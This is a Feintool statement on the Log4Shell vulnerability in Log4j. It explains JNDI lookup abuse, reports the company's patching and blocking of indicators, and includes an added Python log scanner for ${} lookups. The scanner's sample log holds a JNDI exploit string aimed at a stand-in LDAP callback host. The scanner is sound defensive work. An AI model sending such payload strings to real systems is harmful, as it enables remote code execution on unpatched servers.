Log4Shell: No data loss or signs of attack at Feintool


Log4Shell is the name given to a critical zero-day vulnerability that surfaced in mid-December, when it was exploited in the wild in remote-code compromises of Minecraft servers. The source of the vulnerability was Log4j, a logging utility used by thousands if not millions of apps, including those used inside just about every enterprise on the planet.

Another well-known example would be Apple iCloud.

What’s Log4j and what makes Log4Shell such a big deal?

Log4j is an open-source, Java-based logging tool available from Apache. It can perform network lookups using the Java Naming and Directory Interface (JNDI) to obtain services from the Lightweight Directory Access Protocol (LDAP). The end result: Log4j will interpret a log message as a URL, go and fetch it, and even execute any executable payload it contains with the full privileges of the main program. Exploits are triggered inside text using the ${} syntax, allowing them to be included in browser user agents or other commonly logged attributes.
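
As an added illustration (not Feintool's tooling and not part of the original statement), the following Python example scans logged request fields for the ${} lookup syntax described above and extracts the scheme and host of any JNDI lookup so they can be compared with known indicators. The log lines, host names and function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines (not taken from any real system).
SAMPLE_LOGS = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.invalid:1389/a}"',
    '198.51.100.9 - - [12/Dec/2021:10:01:09 +0000] "GET /?q=${outer:${inner}} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

def extract_lookups(text):
    """Return (expression, nested) for every balanced ${...} found in text."""
    found, i = [], 0
    while (start := text.find("${", i)) != -1:
        depth, j, nested = 0, start, False
        while j < len(text):
            if text.startswith("${", j):
                depth += 1
                nested = nested or depth > 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        if depth != 0:            # unterminated here: retry just past this "${"
            i = start + 2
            continue
        found.append((text[start + 2:j], nested))
        i = j + 1
    return found

def scan_line(line):
    """Report JNDI lookups (with scheme and host) and nested lookups in one line."""
    findings = []
    for expr, nested in extract_lookups(line):
        if expr.lower().startswith("jndi:"):
            try:
                url = urlsplit(expr[5:])
                scheme, host = url.scheme.lower(), url.hostname
            except ValueError:    # malformed URL: still report the expression
                scheme, host = None, None
            findings.append({"kind": "jndi", "scheme": scheme, "host": host, "expr": expr})
        elif nested:              # nested expressions are reported for manual review
            findings.append({"kind": "nested", "scheme": None, "host": None, "expr": expr})
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for a sequence of log lines."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in scan_line(line)]
```

The host values returned by scan() can be checked against a blocklist of known indicators, and any hit marks a log entry worth investigating on the system that wrote it.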

What Feintool has done so far

As of today, all applications that are accessible from the Internet have been checked, patched or disabled. To date, we have had no data loss or signs of attack.
To protect our systems, we have blocked the known indicators of compromise (IOCs) and ensured that our Endpoint Detection and Response (EDR) solution is able to detect any attempt to exploit this vulnerability.